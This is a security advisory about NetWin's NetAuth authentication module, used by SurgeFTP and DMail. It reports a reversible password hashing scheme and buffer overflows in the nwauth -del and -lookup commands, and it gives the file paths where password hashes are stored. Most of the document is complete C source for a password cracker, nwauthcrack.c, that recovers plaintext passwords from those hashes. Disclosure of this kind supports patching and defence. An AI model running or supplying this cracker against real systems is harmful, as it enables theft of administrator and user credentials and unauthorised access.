|
Brought to you by:
Suppliers of:
|
|
|
| |
NetWin's NetAuth, a web based email management system for users, domain administrators, and system administrators, contains multiple security vulnerabilities.
These security holes allow an attacker to decrypt the passwords, and to execute of arbitrary code. |
| |
Credit:
The information has been provided by ByteRage.
|
| |
Vulnerable systems:
NetWin version 3.0b
NetWin version 2.0
Password storage vulnerability:
The 'NetWin Authentication module' that is used by SurgeFTP, DMail and other programs uses quite an unusual hashing algorithm to store the password hashes. Because of the complexity of the hashing algorithm, the users of NWAuth may not be aware of it, but the algorithm is flawed in (at least) two ways:
1) The password hashes can be decrypted.
2) One hash can match more than one password.
Fortunately, SurgeFTP has implemented anti-hammering techniques to prevent password brute forcing.
The password hashes used by SurgeFTP can be found within the files: \surgeftp\admin.dat (sysadmin password) & \surgeftp\nwauth.clg (user passwords)
Buffer overflow vulnerabilities:
NWAuth also contains many buffer overflows throughout the source code (especially older versions, for example, 2.0) that might a root/administrator compromise of the system due to execution of arbitrary code. Here are some examples:
1) The nwauth -del command causes an access violation when supplied with a very long username, this might not be a big deal since only administrators are supposed to delete users.
2) The nwauth -lookup command causes an access violation when supplied a username of about 1000 characters, this might be triggered by an attacker if the program would pass this username from a "USER" command.
Exploit code: (Password cracker)
/********************************************************************
* nwauthcrack.c - NetWin Authentication Module password cracker *
* the SurgeFTP encrypted passwords can be found in the admin.dat & *
* nwauth.clg files in the nwauth.exe directory *
* by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
********************************************************************/
#include <string.h>
#include <stdio.h>
FILE *fh;
/* the following table indices refer to the characters our
generated password may consist of (true/false), since
we don't want to go into too much trouble when typing
everything in :) */
const char okaychars[256] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
1,1,1,1,1,1,1,1,1,1,1,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
};
/* DECRYPTION ALGORITHMS */
int enumpwds(unsigned char encrypted[]) {
int heavycrypt0;
unsigned int num=0, i, x;
unsigned char j[256], decrypted[256];
for(i=0; i<256;i++) { j[i] = 0; }
brute:
heavycrypt0 = (unsigned char)encrypted[1]*255+(unsigned char)encrypted[0];
for(i=0; i+2 < strlen(encrypted); i++) {
for(x=j[i]; x < 256; x++) {
if ((x * (heavycrypt0+1) % 40 == (encrypted[i+2]-0x41)) & okaychars[x]) {
decrypted[i] = x;
break;
}
}
if (x == 256) {
next:
if (i == 0) return num;
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
for (i=x; i < 256; i++) { j[i] = 0; }
goto brute;
}
heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
}
decrypted[i] = '\x00';
num++;
printf("%s\n", decrypted);
if (j[i-1] < 256) { j[i-1] = decrypted[i-1]+1; x = i; } else { i--; goto next; }
for (i=x; i < 256; i++) { j[i] = 0; }
goto brute;
}
/* DECRYPTION ALGORITHMS END */
void main(int argc, char ** argv) {
char buf[256]; int k, l;
printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");
if (argc < 2) { printf("Syntax : %s <password>\n", argv[0]); return; }
printf("%s ->\n",argv[1]);
printf("\n%d passwords found for %s\n",enumpwds(argv[1]),argv[1]);
}
|
|
|
|
|
